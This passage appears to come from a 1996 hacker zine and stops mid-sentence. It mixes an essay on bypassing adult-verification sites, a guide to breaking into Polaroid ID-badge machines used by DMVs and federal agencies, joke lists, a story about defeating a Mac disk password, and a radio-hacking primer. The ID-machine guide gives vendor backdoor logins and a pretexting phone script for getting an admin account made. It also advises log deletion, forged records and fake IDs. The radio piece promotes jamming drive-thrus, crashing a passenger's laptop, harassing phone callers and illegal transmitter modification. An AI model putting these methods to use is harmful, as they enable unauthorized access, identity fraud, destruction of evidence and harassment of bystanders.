+'indecent material' would not disappear, but merely go further underground.
+
+Indeed, this is exactly what happened.  Soon thereafter Adult Verification
+services began popping up.  AVS (Adult Verification Services), Adultcheck,
+Adultpass, and a slew of others came up with an idea.
+
+The idea was to verify a person's adult status by acquiring one's credit 
+card number.  This would, ahem, without a doubt, prove that the individual
+was 18.  Why?  Because you had to be 18 to have a credit card of course!
+Someone obviously didn't take into consideration the five or so million 
+pre-adults that would make it their goal to surpass such shotty 
+authentication.
+
+It began by the government stating that a credit card is a legal means of 
+verifying one's age, this allowing those distributing 'porno'graphic 
+materials to continue distributing to those 18 and over.  The initial 
+means that the 'providers of porn' used to do this was to basically 
+verify the format of the card and not actually run a check on it.  As 
+most of us all know, there have been plenty of "Credit Card Generators" 
+produced in the last five years, quite capable of fooling these shotty 
+authentication systems.
+
+As this authentication was obviously lacking in the "authentication" 
+part, the next step was to actually validate the cards.  This began and 
+ended nearly as quickly, for finding a credit card (for example, in 
+mommy's purse), junior could peruse porn until his dick grew red and chafed.
+
+On June 12, 1996 it was was determined that the CDA indeed violated one's 
+constitutional rights and was striken down as a law.  More on this at 
+<http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ/>.
+
+But it didn't seem to phase the Authentication services.  
+
+The Authentication Services currently verify age by obtaining a credit 
+card, verifying it, and actually charging a fee for the service.  About 
+$9.95 for two years which entitles you to an abundance of graphic, ad, 
+and airbrush-laden web pages and images.  This most likely sufficiently 
+scared off the less determined of minors because now they'd be engaging in 
+credit card fraud.  
+
+It's truly odd that after it has been deemed legal to distribute said 
+porn, that all of these services still insist that it's illegal to do 
+so.  Let us realize that Usenet barely flinched when the CDA was in 
+effect, and still offered gigs upon (glorious) gigs of nude bodies to 
+oggle at.
+
+After taking a good look at this whole bizarre operation, I have made a 
+few conclusions of my own.  
+
+Charging $9.95 for two years of access to 'porno'graphy seems a little too 
+good to be true.  One must realize that there is a charge to the billing 
+company for each credit card transaction made.  I'd be surprised if it 
+wasn't half of this ten bucks.  These authentication companies also pay 
+"handsomely" the purveyors of porn.  In order for such a service to 
+function, obviously there needs to be an agreement with the distributor and the 
+authenticator.
+
+Now, one that distributes 'porno'graphy on the Net will certainly not feel 
+the need to do these Verification Services any favors.  The majority of 
+people that do run these explicit sites are certainly not interested in 
+supporting censorship of their material (probably 90% money-making).  The 
+AVS's knew this and offered a stipend to those using their services.
+
+The AVS's currently work by paying the site that contains 'indecent 
+material' a certain amount each time that site gets another person to 
+sign up with their service.  This works by the AVS sending html that is 
+put on a verification page.  If one finds this page important enough, 
+they may be convinced to sign up with the service that allows you to 
+access it.  
+
+The stipend is generally around $4.00, and as high as $7.50.  There are 
+many AVS's, and the majority of the said 'sites' use more than one, 
+sometimes all of them for verification.  If a particular site uses one 
+AVS exclusively, the AVS will pay on the highest end of their scale for new 
+recruits.
+
+If we get into some simple math, we may find some contradictions 
+regarding this.  The initial fee to those interested in accessing porn is 
+$9.95.  Out of these we can safely say that more than $3.00 goes to 
+simply checking the validity of the card and billing it.  This leaves the 
+AVS with $6.95.
+
+Now, on the receiving end we have a very minimum of $4.00 going towards 
+each new person that signs up.  It's probably safe to say that over 90% 
+of new customers to these AVS's sign-up through 'porno'graphic pages and 
+not directly from the site itself.
+
+So $9.95 ends up being $6.95 after expenses, and then the service sends 
+another $4.00 to the person that gave them the account.  This leaves the 
+AVS with a maximum of $2.95 total.
+
+The costs running an AVS are surely not exorbant, but are certainly not 
+cheap.  I have yet to find an AVS running off of anything less than at T1 
+(1.544mbit) speeds.  This translates to an extreme minimum of 1k/month.  
+If you include employees, office space, and incidentals, running any such 
+service couldn't cost less than 5k a month at the very least.  This would 
+mean to break even one would have to bring in:
+
+5000/2.95
+
+1694 new customers a month, simply to break even!  That's a lot 
+considering the membership lasts for two years.  And this is in the 
+*best-case* scenario.  I would be hard-pressed to believe that one such 
+service could steadily rely on such a base of new clients every month 
+indefinitely!
+
+I have theorized that these services are in fact not self-run moneymaking 
+ventures, but are actually being funded by a higher authority.  It's 
+quite feasible to believe that the government, having been challenged and 
+beat, have actually allocated funds to protecting the minors of the Net 
+from obscenity.  It's *certainly* not far-fetched, especially with Al 
+Gore (think, Tipper) in an improperly high position.
+
+The government could allocate a comparitively paltry sum of one million a 
+year towards funding (even creating) companies that act merely to pay 
+people to be complacent.  What if the government merely let relatively 
+computer proficient professionals bid on forming these AVS's?  What if?
+
+Well, unless i'm overlooking something, I can't see too much illogic to 
+my theory.
+
+Another consideration of these services is that even at their current 
+state, they are extremely easy to overcome.  So easy, in fact, that their 
+existence will hardly offer much resistance to a horny teenager.  Remember, 
+people will do anything to get 'porno'graphy.
+
+Such holes in these systems are that the verified member of such an AVS 
+connects to a sexually explicit site, is bounced backed to the AVS for 
+authentication, and is then bounced back again to the page (url) that 
+contains the "naughty stuff".  This page can be simply bookmarked and 
+distributed to anyone and their Mom.
+
+Why?  All the services I've come across (the largest ones) do not 
+authenticate the target url, they target the initial "warning" page and 
+contain information to pass the user on to the naughty stuff.  Thus if 
+one single person can obtain the target url, he can bypass all future 
+authentication and can as well pass the url on through various channels, 
+quite easily ending up in the hands of a minor.
+
+As well, if stupidity was a metaphor for AVS's, most of the target url's 
+have filenames such as "warning.html" or "granted.html".  Any 
+half-respectable search engine (such as AltaVista) is capable of snarfing 
+out such information.  Doubly-so because these services will obviously 
+want to advertise their existence.
+
+The only method that seems to partially protect minors from 'porno'graphy 
+is the method of installing client-based software such as SurfWatch that 
+try to censor 'porno'graphy.  This, as well, relies on a willing company or 
+individual to operate.  This works quite archaically by imbedding META 
+tags in html source. For example:
+
+<META name="description" content="Validate Age Verification 
+Service"><meta name="keywords" content="sex erotica nude porn penthouse 
+pornography erotic porno adult playboy dating marriage love date age 
+validate validation protect children kids money commercial wealth nudes 
+pics jpg gif">
+
+This particular tag would be placed in the receiving html of a 
+co-operative service or individual.  The client-based software would 
+search for such tags and censor the content accordingly.  From my 
+understanding, those using AVS's are not required to embed these tags in 
+their "warning" page html.  If they do not, which I would imagine many 
+probably wouldn't, then suddenly these client-based censorship tools are 
+rendered useless.
+
+So in conclusion, I would give a big thumbs-down for this whole pathetic 
+means of controlling freedom.  The Internet was meant to be a place to 
+free exchange of information.  Today a minor is just as able to find 
+explicit material on the Net as he/she is able to dig through Mom and 
+Dad's dresser for copies of Hustler.  A minor is just as capable of 
+watching R or X-rated movies, stealing a magazine from a store, or even 
+buying one.  
+
+It's time to stop using half-assed and crippled ways of protecting kids 
+from obscenity on the Net.  If you're a parent and you don't want your 
+child to view such 'porno'graphy, then why not do what you're supposed to 
+do and discipline the kid.
+
+Lazy fuckers.
+
+
+t3
+.end
+
+
+
+                                ----<>----
+
+
+T.A.C.D Presents...
+Hacking ID Machines 
+By PiLL
+
+Table Of Contents
+
+I.   What is an ID Machine & who uses them?
+II.  Hardware and software of the ID machines
+III. Common security of ID Machines
+IV.  What to do once you get in
+V.   Closing
+VI.  Greets
+
+
+Part One: What is an ID machine and who uses them?
+
+First we will start with the basics. An IDM or ID Machine is exactly
+what the name entails.  It is a computer that government and large
+companies use to make security badges and ID cards for employees and
+visitors. All of the IDM's are DOS based so security, to say the least,
+sucks. There are four models of IDM's. The one we will be covering the
+most is the latest and greatest: the ID 4000. Also in the family of
+IDM's are the 3000, 2000+, and 2000. I have heard of an ID 1000 but I
+have yet to see or play with one, so if you find one, tell me. The 2000
+is DOS 3.3 so I can imagine that an ID 1000 is even a bigger waste of
+time. IDM's are manufactured by a branch of Polaroid entitled Polaroid
+Electronic Imaging. If you want more information on IDM's call (800)343-5000
+and they will send you some general specs.  I will let you know right
+off the start that these machines sell for as much as $75,000.00 but the
+average price is around $40,000.00. So getting caught crashing one is
+NOT a good idea.
+ 
+You are probably wondering what companies use ID machines.  Here is a
+brief list. All of the Colorado and Alaska DMV's, The IRS, The FBI, The
+U.S. Mint, The Federal Reserve, almost any military branch, Hewlett
+Packard, Polaroid, Westinghouse (I wouldn't recommend fucking with them:
+for more information on Westinghouse check out the movie Unauthorized Access
+available from CDC's home page), and all of the major prisons in the
+United States. By now you should be getting ideas of the potential fun
+you can have. Not that I would ever use what I know for anything illegal
+;)
+
+Part Two: Hardware and Software
+
+I will cover each machine in order but you will probably notice that the
+ID4000 will get by far more attention then any other.
+
+Hardware and Software for the 2000+ and 2000 is kind of like teaching
+someone about the Apple ][ and how to use Logo so I will try not to bore
+you to much with them. The 2000 series are unique to the others because
+they are one full unit. The hardware is basically a really cheesy
+oversized case with a 9 monochrome monitor, a 3 monitor for viewing the
+victim of the hideous picture it takes, a 286 Wyse computer with 1meg of
+RAM (really hauls ass), a data compression board, image processing board
+(*Paris* Board), a signature scanner, a color film recorder or CFR, a
+WORM Drive, a modem, and most of the time a network card so the data can
+be stored on a mainframe. The Software of the 2000 series is a really
+neat database program running under DOS 3.3. If you have never heard of
+or used EDLIN, I would not recommend playing with a 2000. The only major
+differences between an ID2000 and an ID2000+ is that the computer on the
+2000+ is a HP Vectra 386 with 4megs and a SCSI Interface. That's all you
+really need to know you probably won't ever encounter one unless you go
+trashing a lot.
+
+The ID3000 is also an HP 386/20 but uses DOS 5.0 and a Matrox Digital
+Processing board instead of the old Paris board of the 2000 series.
+
+This came about when your state ID actually started to remotely resemble
+you in 1992. Also in the 3000 years their were more peripherals
+available such as the latest CFR at the time (I think it was the 5000),
+PVC printers, and bar code label printers.  The software is basically
+DOS 5.0 but this time they use a database shell much like DOSSHELL as
+the interface with the machine. The 3000 uses SYTOS for data storage and
+transfer and it is best to dial in using a program called Carbon Copy.
+
+The 4000 is the best even though it's not that great. It was is the
+first IDM in the Polaroid line that let the customer customize the
+machine to their needs.  This is the machine that you see when you go to
+the DMV, at least in Denver.  It consists of a JVC camera, a Matrox
+processing board, a data compression board, an Adaptec 1505 SCSI card, a
+14.4 modem, a network card, and can have any of the following added to
+it: a PVC printer (in case you didn't know that's what they use on
+credit cards), a magnetic stripe encoder, a bar code printer, a thermal
+printer, a CFR (usually the HR6000 like at the DMV), a Ci500 scanner,
+and signature pad, a finger print pad (interesting note if you have a
+black light and one of the new Colorado Driver licenses hold it under a
+black light and look what appears under your picture, you should see
+your finger print), and a laminator. Now some of you are thinking what
+about the holograms? Those are actually in the lamination, not on the
+badge itself. To obtain lamination walk into the DMV and look to the
+right or left of the machine if you see a little brown box that's what
+you need, but please remember to leave some for the rest of us that
+might be next in line. Or you can go to Eagle hardware and buy a bolt
+cutter for the dumpster but that's a different text file.
+
+The 4000 runs DOS 6.0 and Windows 3.1. The actual software for the 4000
+is a terrible Visual Basic shell that reminds me of the first time I ran
+that program AoHell. The only difference is that AoHell did what it was
+suppose to, the 4000 software is a headache of GPF's , Environment
+Errors, and Vbrun errors. A nice feature that the 4000 has that the
+other IDM's don't, is the ability to create and design your own badge.
+You can even do it remotely ! ! =) . Unfortunately the program Polaroid
+developed for this makes paintbrush look good. But on a bright note you
+can import Images.
+
+Briefly here is a run down of what exactly happens when you get your
+picture taken on an ID4000 at the DMV. At the first desk or table the
+narrow eyed, overpaid, government employee will ask you for some general
+information like a birth certificate, picture ID, name, address, SSN#, what
+party you prefer to vote for, and whether or not you want to donate your
+organs in the event of your untimely demise. You reply by handing her
+your fake birth certificate and ID that you had printed no more then an
+hour ago, hoping the ink is dry. "My name is Lee Taxor I reside at
+38.250.25.1 Root Ave in the Beautiful Port apartments #23 located in
+Telnet, Colorado, I prefer to vote for Mickey Mouse of the Disney party,
+and can't donate my organs because Satan already owns them." The
+disgruntled employee then enters all your information in the correct fields
+while never taking an eye off you in fear that you know more about the
+machine he or she is using then they do (perhaps you shouldn't of worn
+your Coed Naked Hacking T-shirt that you bought at DefCon 4). As soon as
+the bureaucrat hits <ENTER> all of the information is sent to a database
+located in the directory named after the computer (i.e.
+c:\ID4000\ColoDMV\96DMV.MDB). Then you are directed to the blue screen
+where you stare at the JVC monitor trying to look cool even though the
+camera always seems to catch you when you have to blink or yawn or even
+sneeze. *SNAP* the picture is taken and displayed on the monitor where
+the employee can laugh at your dumb expression before printing it. If
+the employee decides to print the picture it is saved as a 9 digit
+number associated with your database record. The 4000 then compresses
+the picture and saves it. So the next time you go in and the pull up
+your record it will automatically find the associated picture and
+display it on the screen. But in the mean time you grab your fake ID the
+DMV just made for you and leave happy.
+
+In a nut shell that's all there is to these machines.
+
+Part Three:  Security
+
+I think a better topic is lack of security.  I have yet to see any of
+these machines that are remotely secure. Before we go any further the
+4000 is best accessed using CloseUp the others using Carbon Copy, But
+any mainstream communications program will more then likely work. You
+Dial and it asks you right away for a username and password. whoa, stop,
+road block right their. Unless of course you know the backdoor that
+Polaroid put in their machines so they can service them. =)
+
+ID4000
+Login: CSD (case Sensitive)
+Password: POLAROID (who would of guessed?)
+ 
+ID3000
+Login: CPS
+Password: POLAROID (god these guys are so efficient)
+
+ID2000+ And ID2000
+Login: POLAROID  (ahh the good old days)
+Password: POLAROID
+
+Now if these do not work because they have been edited out, there are
+still a few VERY simple ways of getting in to your victims system. The
+first is to go with every hackers default method of social engineering.
+The best way to do this is to call them up and say "Hi this is (insert
+tech name here) with Polaroid Electronic Imaging! How is it going down
+there at (name of company)."  The say "pretty good!" in a funny voice
+thinking what great customer support. You say "How is the weather been
+in (location of company)" they reply with the current weather status
+feeling that they can trust you cause you are so friendly. You say "well
+(name of person), we were going through our contacts one by one doing
+routine upgrades and system cleaning to ensure that your database is not
+going to get corrupted anytime soon and that everything is doing what it
+is supposed too, if you know what I mean (name of person)." Now they
+reply "oh yeah" and laugh with you not having a clue of what you are
+talking about. And they then say "well everything seems to be in order."
+You say "great sounds good but old *Bob* would have my head if I didn't
+check that out for myself." Then you ask if the modem is plugged in and
+wait for the reply. The either say yes or no then you ask them go plug
+it & give you the number or just give you the number. Then they comply
+cause they are just sheep in your plan. You say "Hey thanks (name) one
+more thing would happen to know if user CSD:Polaroid exists or did you
+guys delete it." If they deleted it ask them to put it back in, giving
+you administrative access. They probably know how to and will comply. If
+they need help have them do the following: Click on the combination lock
+icon at the top of the screen. This will bring them to the
+administrative screen and they will have the choices of Purge, Reports,
+and Passwords. Have them click on passwords. Then have them enter you as
+a new user with CSD as your Name and Polaroid as your Password. After
+they have done that make sure they give you all the Keys. The keys are
+basically access levels like on a BBS. Lets some users do certain things
+while others can not. The only key you need is administrative but have
+them give you the rest as well.  The other keys are Management and Luser
+I think. The keys are located to the left of the user information that they
+just entered. Then have them click OK and close the call politely. Ta
+da!! Here is a list of Polaroid phone techs but I would not advise using
+Bob or Aryia cause their big wigs and nobody ever talks to them.
+
+Senior Techs of Polaroid                                          
+Regular Techs
+Bob Pentze (manager)                                              
+   
+Don Bacher
+Aryia Bagapour (assistant)                                       
+Richard          
+Felix Sue                                                         
+     
+Rick Ward
+Jordan Freeman                                                    
+   
+Dave Webster
+ 
+Call 1-800-343-5000 for more Names =)
+
+
+
+Part Four: What to Do once you get in
+
+Now that your in you have access to all of their database records and
+photos.  Upload your own and have fun with it! Everything you do is
+logged so here's what you'll want to do when you're done making yourself
+an official FBI agent or an employee of the federal reserve. Go to all
+of the available drives which could be a lot since they are on a network
+and do a search from root for all of the LOG files i.e. C:\DIR /S *.LOG
+Then delete the fuckers!!!! You can also do this by FDISK or formatting.
+Just kidding! But if you want to do it the right way then go to the
+admin screen and purge the error and system logs.
+
+Basically if you want the form for government badges or the FBI agents
+database this is the safest way to go. These computer do not have the
+ability to trace but it does not mean the phone company doesn't! ANI
+sucks a fat dick so remember to divert if you decide to do this. If you
+don't know how to divert I recommend you read CoTNo or Phrack and learn
+a little bit about phone systems and how they work.
+
+Moving around in the software once your past the security is very simple
+so I'm not going to get into it. If you can get around a BBS then you
+don't need any further help. Just remember to delete or purge the logs.
+
+Part Five: Closing
+
+If your looking for some mild fun like uploading the DMV a new license
+or revoking your friends this is the way to do it. However if you're
+looking to make fake ID's I recommend you download the badge format and
+purchase or obtain a copy of IDWare by Polaroid. IDware is a lot like
+the 4000 software except you only need a scanner not the whole system.
+As a warning to some of the kids I know of one guy who bought a
+$50,000.00 ID4000 and paid it off in a year by selling fake ID's. When
+Polaroid busted him they prosecuted to the fullest and now the guy is
+rotting in a cell for 25 to 50 years. Just a thought to ponder.
+
+Peace 
+PiLL
+
+Greetz
+Shouts go out to the following groups and individuals: TACD, TNO, MOD,
+L0pht, CDC, UPS, Shadow, Wraith, KaoTik, Wednesday, Zydirion, Voyager,
+Jazmine, swolf, Mustard, Terminal, Major, Legion, Disorder, Genesis,
+Paradox, Jesta, anybody else in 303, STAR, BoxingNuN, MrHades, OuTHouse,
+Romen, Tewph, Bravo, Kingpin, and everyone I forgot cause I'm sure there
+are a bunch of you, sorry =P.
+
+                                ----<>----
+
+ The Top Ten things overheard at PumpCon '96                   
+
+10. "You gotta problem? Ya'll gotta rowl!"
+               - Keith the security guard
+
+ 9. "My brain has a slow ping response" 
+               - Kingpin
+
+ 8. "Space Rogue, I've been coveting your pickle."
+               - espidre
+
+ 7. "If there's space -n shit, then it's Star Trek. Unless there's that
+      little Yoda guy - then it's Star Wars" 
+               - Kingpin
+
+ 6. "I'm the editor of Phrack. Wanna lay down with me?"
+               - A very drunk unnamed editor of Phrack
+
+ 5. "Let's go find that spic, b_, no offense"  
+               - A drunk IP to b_.
+
+ 4. "I'm lookin for that fat fucker Wozz.  He's big, and got a green shirt,
+     and glasses, and curly hair, just like you.  As a matta a fact, you
+     gots similar characteristics!" 
+               - A drunk IP to wozz.
+
+ 3. "He was passed out on the floor... so I pissed on him" 
+               - An unknown assailant referring to IP       
+
+ 2. "It was the beginning and the end of my pimping career"
+               - Kingpin referring to his escapade of getting paid
+                 two dollars for sex.
+
+ 1. "French Toast Pleeeeze!"
+               - Everyone 
+
+ 
+                                ----<>----
+
+
+       TOP 0x10 REASONS TO KICK && WAYS TO GET
+         KICKED OUT OF #HACK (Revision 0.1.1)
+                    By SirLance
+
+0x0f asking for any information about any Microsoft products
+0x0e talking about cars, girls, or anything unrelated to hacking
+0x0d flooding with a passwd file contents
+0x0c asking how to unshadow passwd
+0x0b being on #hack, #warez and #hotsex at the same time
+0x0a asking for ops
+0x09 using a nick including words like 'zero' 'cool' 'acid' or 'burn'
+0x08 asking if someone wants to trade accounts, CCs or WaR3Z
+0x07 asking what r00t means
+0x06 asking when the latest Phrack will be released
+0x05 asking where to get or how to create a BOT
+0x04 having the word BOT anywhere in your nick
+0x03 having a nick like Br0KnCaPs and SpEak LiK3 Th4t all the time
+0x02 asking for flash.c or nuke.c, spoof.c, ipsniff.c or CrackerJack
+0x01 thinking #hack is a helpdesk and ask a question
+0x00 being on from AOL, Prodigy, CompuServe, or MSN
+
+                   -EOL-
+
+        
+                                ----<>----
+
+                             International business
+                                    by HCF
+
+
+Friday, 3:00am 4.12: 
+	I get the call:
+
+	Julie:	"You break into computers right...?"
+	Dover:	"Yea, what kind..."
+	Julie:	"Mac, I think."
+	Dover:	"Hmm... Call ``HCF'' at 213.262-XXXX"
+	Julie:	"Uh, will he be awake...?"
+	Dover:	"Don't worry (snicker) he'll be awake."
+
+Friday, 4:00am 4.12
+	HCF called me at 4am after he got the call from Julie:
+
+	HCF:	"you got me into this mess, I need to barrow your car."
+	Dover:	"Umm shure.  Ok..."
+	HCF:	"I'll be right over..."
+
+Friday, 12:30pm 4.12: upon returning the car:
+
+	HCF: 	"Umm, got a parking ticket, I'll write you a check later..."
+
+(I never got the check.)
+
+Kathleen's comment to Julie which was passed to me (days later):
+
+	Kath:	"Why didn't you tell me he was cute, I want him for myself!"
+
+When I passed this on to HCF:
+
+	HCF:	"She is *gorgeous* but not without a wet suit..."
+
+
+
+	Here is the story that happened early one Friday morning...  The names
+have been changed to protect the innocent, the guilty, and the innocent-looking
+guilty....
+
+I was reading up on a new firewall technology, the kind that locks
+addresses out of select ports based on specific criterion, when the phone
+rang.
+
+"Hello?"
+The voice of a women, between 18 and 30, somewhat deep like Kathleen
+Turner's, said, "Uh, hello..."
+
+There was an obvious pause.  It seemed she was surprised that I was so
+awake and answered sharply on the second ring.  It was in the middle of my
+working hours; 3:30 AM. There was no delay in the phone's response, no
+subtle click after I picked up, and the audio quality was clear.
+
+"Do you hack?"  she asked.
+
+Recorder on.  Mental note: *stop* getting lazy with the recorder.
+
+"No.  Are you on a Cell phone?" I responded
+"No."
+"Are you using a portable battery operated telephone?"
+"No.  I was told by my friend ..."
+"Are you in any way associated with local, federal or state law enforcement
+agencies?"
+"Oh, I get it.  No I'm not.  Julie said that you could help me."
+
+I knew Julie through a mutual friend.
+
+"Could you call me back in 5 minutes."
+"Well, um, ok."
+
+Throughout the whole conversation, the phones on her end were ringing off
+the hook.  As soon as I hung up, Ben, the mutual friend, called.  Julie had
+called him first, and he gave her my number.  I got his reassurance that
+this was legit.  Ben was snickering but wouldn't divulge what it was about.
+By now my curiosity was piqued.
+
+The phone rang again, "I need someone who can break into a computer."
+"Whose computer?"
+"Mine."
+
+It turns out that the woman had hostility bought out the previous owner of
+this business.  The computer in question had both a mission-critical
+database of some sort and a multi-level security software installed.  She
+had been working under a medium permission user for some time.  The
+computer crashed in such a way as to require the master password (root) in
+order to boot.  The pervious owner moved out of town, could not be
+contacted, and was most likely enjoying the situation thoroughly.  The
+woman was unaware of any of the technical specifications or configuration
+of the machine.  I was able to find out that it was a Apple Macintosh Color
+Classic; a machine primarily distributed in Japan.  It would be around
+10:00 AM in Tokyo.
+
+"Why are the phones ringing so often at this time of the morning?" I asked.
+"I do a lot of international business."
+
+I was intrigued, the answer was smoothly executed without a delay or pitch
+change.  I took the job.
+
+Upon arriving, I was greeted by a young, stunningly beautiful, woman with
+long, jet-black hair and stressed but clear green eyes.  I checked the room
+for obvious bugs and any other surveillance.  There were calendars on the
+wall, filled out with trixy and ultra-masculine sounding names like Candy
+and Chuck.  The phones had died down some. The machine in question was
+obviously well integrated into the environment; dust patterns, scratch
+marks, worn-out mouse pad;  it had been there for some time.  There was a
+PBX, around 6 to 8 voice lines, three phones, and no network, modem or
+outside connectivity.
+
+The security, which we'll call VileGuard, defeated all the "simple" methods
+of by-passing.  None of the standard or available passwords, in any case or
+combination, worked.  A brute-force script would be slow as second failure
+shut the machine down.
+
+I made a SCSI sector copy onto a spare drive and replaced it with the
+original.  This involved tearing open the machine, pulling various parts
+out, hooking up loose wires, merging several computers, and turning things
+on in this state.  Trivial and routine, I did it rapidly and with both
+hands operating independently.  For those who have never opened the case of
+an all-in-one Mac, it involves a rather violent looking smack on both sides
+of the pressure fitted case backing, appropriately called "cracking the
+case."  This did not serve well to calm the nerves of the client.  After a
+few moments of pallor and little chirps of horror, she excused herself from
+the room.
+
+While the SCSI copy preceded, I overheard her taking a few calls in the
+other room.  What I heard was a one-sided conversation, but I could pretty
+much fill in the blanks,
+
+"Hello, Exclusive Escorts, may I help you?"
+"Would you like to be visited at your home or at a hotel?"
+"Well, we have Suzy, she's a 5'4" Asian lady with a very athletic body.
+Very shy but willing, and very sensual, she measures 34, 24, 34."
+"Big what?  Sir, you'll have to speak a little clearer."
+"Oh, I see, well we have a very well endowed girl named Valerie, she's a
+double D and measures 38, 24, 34.  Would that be more to your liking?"
+
+It was not easy to keep from busting up laughing.
+
+"He wants you to do what?  Well, charge him double."
+
+With the new drive installed, and to predictable results, I fired up a hex
+editor. My experience has been that full-disk encryption typically slows
+the machine down to the point where the user disables it.  At around
+$5C9E8, I found, "...507269 6E74204D 616E6167 65722045 72726F72...
+...Print Manager Error..." in plain text.  I searched for some of the
+known, lower permission, passwords.  I found a few scattered around sector
+$9b4.  The hex editor I was using could not access the boot or driver
+partitions, so I switched to one that could.  It's not as pretty of an
+interface as the last editor, and is rather old.  Its saving grace though
+is that it doesn't recognize the modern warnings of what it can and cannot
+see.  There it was, VileGuard; driver level security.
+
+"Eric is endowed with eight and has a very masculine physique."
+
+Every male was "endowed with eight," every female had relatively identical
+measurements.
+
+I hunted fruitlessly around the low sectors for what might be the master
+password.  All awhile wishing the find function of the editor would accept
+regexp.  All the other passwords were intercapped on the odd character, but
+that was a convention of the current owner, and not necessarily used by the
+past owner.
+
+"Oh, you want a girl that is fluent in Greek?"
+
+It's not professional for me, and not good salesmanship for her, to have me
+overheard laughing myself into anoxia.  After trying to straighten up and
+gather my wits together again, I began to consider an alternate
+possibility.  If I don't know the password, what happens if I make it so
+that the driver doesn't either.  Return to the first-installed condition
+perhaps? It was a thought.  It turned out to be a bad thought, resulting in
+my haphazardly writing "xxxx" over, pretty much, random sectors of the
+driver partition.
+
+"Oh yes sir, Roxanne prefers older men.  She appreciates how very
+experienced they are.  I understand sir, and I'm sure she can help you with
+that."
+
+Before I made a second copy and whipped out the RE tools, TMON and MacNosy,
+I tried booting. The results were, as you'd expect, that the disk didn't
+mount.  Instead, it asked me if I wanted to reinitialize the disk.  Pause.
+Think... ya, why not. This was most definitely farther than I had gotten
+with the secure driver installed and functional.  I canceled and fired up
+one of many disk formatters I had on hand.  Though the formatter wasn't the
+slickest, it had proven itself repeatedly in the past.  Its main quality
+was that of writing a driver onto a disk that is in just about *any*
+condition.  It's made by a French drive manufacturer.  As dangerous as this
+behavior is, I'm sure it's a planned feature.  It could see the drive and
+allowed me to "update" the driver.  A few seconds later, a normal
+"finished" dialog.
+
+"Yes, Stan carries a set of various toys with him.  No, I don't believe he
+normally carries that, but I'm sure if you ask him nicely, he'll drop by
+the hardware store on his way and pick one up."
+
+I rebooted.  It worked.  I copied over the disk's data and reformatted.
+Time to try it on the original drive (I had, of course, been working on my
+copy.)  Upon startup, before anything could be accessed, "Please input the
+master password..."
+
+Puts an unusual twist on the phrase, "adverse working conditions"
+
+- HCF
+
+Note 1: Payment was in currency.
+Note 2: If you ever think you understand the opposite sex's view on sex,
+you're underestimating.
+
+
+                                ----<>----
+
+
+	The Beginners Guide to RF hacking
+
+		by Ph0n-E of BLA & DOC
+
+
+     Airphones suck.   I'm on yet another long plane ride to some
+wacky event.  I've tried dialing into my favorite isp using this lame GTE
+airphone, $15 per call no matter how long you "talk".  In big letters it
+says 14.4k data rate, only after several attempts I see the very fine
+print, 2400 baud throughput.  What kind of crap is that?  A 14.4 modem that
+can only do 2400?  It might be the fact they use antiquated 900MHz AM
+transmissions.  The ATT skyphones that are now appearing use imarsat
+technology, but those are $10/minute.  Anyway they suck, and I have an
+hour or so before they start showing Mission Impossible so I guess I'll
+write this Phrack article Route has been bugging me about.
+
+   There are a bunch of people who I've helped get into radio stuff, five
+people bought handheld radios @ DefCon...  So I'm going to run down some
+basics to help everyone get started.  As a disclaimer, I knew nothing about
+RF and radios two years ago.  My background is filmmaking, RF stuff is just
+for phun.
+
+   So why the hell would you want to screw around with radio gear?  Isn't it
+only for old geezers and wanna be rentacops?  Didn't CB go out with Smokey
+& the Bandit?  
+
+Some cool things you can do:
+
+   Fast-food drive thrus can be very entertaining, usually the order taker
+is on one frequency and the drivethru speaker is on another.  So you can
+park down the block and tell that fat pig that she exceeds the weight
+limit and McDonalds no longer serves to Fatchix.  Or when granny pulls up
+to order those tasty mcnuggets, blast over her and tell the nice MCD slave
+you want 30 happy meals for your trip to the orphanage.  If you're lucky
+enough to have two fast food palaces close to each other you can link them
+together and sit back and enjoy the confusion.
+
+   You've always wanted a HERF gun, well your radio doubles as a small
+scale version.  RF energy does strange and unpredictable things to 
+electronic gear, especially computers.  The guy in front of me on the plane
+was playing some lame game on his windowz laptop which was making some very 
+annoying cutey noises.  He refused to wear headphones, he said "they mushed 
+his hair...".  Somehow my radio accidentally keyed up directly under his
+seat, there was this agonizing cutey death noise and then all kinds of cool
+graphics appeared on his screen, major crash.  He's still trying to get it
+to reboot.
+
+   Of course there are the ever popular cordless phones.  The new ones work
+on 900MHz, but 90% of the phones out there work in the 49MHz band.  You can
+easily modify the right ham radio or just use a commercial low band radio
+to annoy everyone.  Scanning phone calls is OK, but now you can talk back,
+add sound effects, etc...  That hot babe down the street is talking to
+her big goony boyfriend, it seems only fair that you should let her know
+about his gay boyfriend.  Endless hours of torture.
+
+   You can also just rap with your other hacker pals (especially useful 
+cons). Packet radio, which allows you up to 9600 baud wireless net 
+connections, its really endless in its utility.
+
+How to get started:
+
+   Well you're supposed to get this thing called a HAM license.  You take 
+this test given by some grampa, and then you get your very own call sign.
+If you're up to that, go for it.  One thing though, use a P.O. box for your
+address as the feds think of HAMs as wackos, and are first on the list when
+searching for terrorists.  Keep in mind that most fun radio things are 
+blatantly illegal anyway, but you're use to that sort of thing, right?
+
+   If you are familiar with scanners, newer ones can receive over a very
+large range of frequencies, some range from 0 to 2.6 GHz.  You are not going
+to be able to buy a radio that will transmit over that entire spectrum.  There
+are military radios that are designed to sweep large frequencies ranges for
+jamming, bomb detonation, etc. - but you won't find one at your local radio
+shack.
+
+A very primitive look at how the spectrum is broken down into sections:
+
+  0 - 30MHz (HF)  Mostly HAM stuff, short-wave, CB.
+ 30 - 80MHz (lowband)  Police, business, cordless phones, HAM
+ 80 - 108MHz (FM radio)  You know, like tunes and stuff
+110 - 122MHz (Aircraft band) You are clear for landing on runway 2600
+136 - 174MHz (VHF)  HAM, business, police
+200 - 230MHz Marine, HAM
+410 - 470MHz (UHF), HAM, business
+470 - 512MHz T-band, business, police
+800MHz cell, trunking, business
+900MHz trunking, spread spectrum devices, pagers
+1GHZ+ (microwave) satellite, TV trucks, datalinks
+
+   Something to remember, the lower the frequency the farther the radio waves
+travel, and the higher the frequency the more directional the waves are.
+
+   A good place to start is with a dual band handheld.  Acquire a Yaesu
+FT-50.  This radio is pretty amazing, its very small, black and looks cool.
+More importantly it can easily be moded.  You see this is a HAM radio, it's
+designed to transmit on HAM bands, but by removing a resistor and solder
+joint, and then doing a little keypad trick you have a radio that transmits 
+all over the VHF/UHF bands.  It can transmit approximately 120-232MHz and 
+315-509MHz (varies from radio to radio), and will receive from 76MHz to about
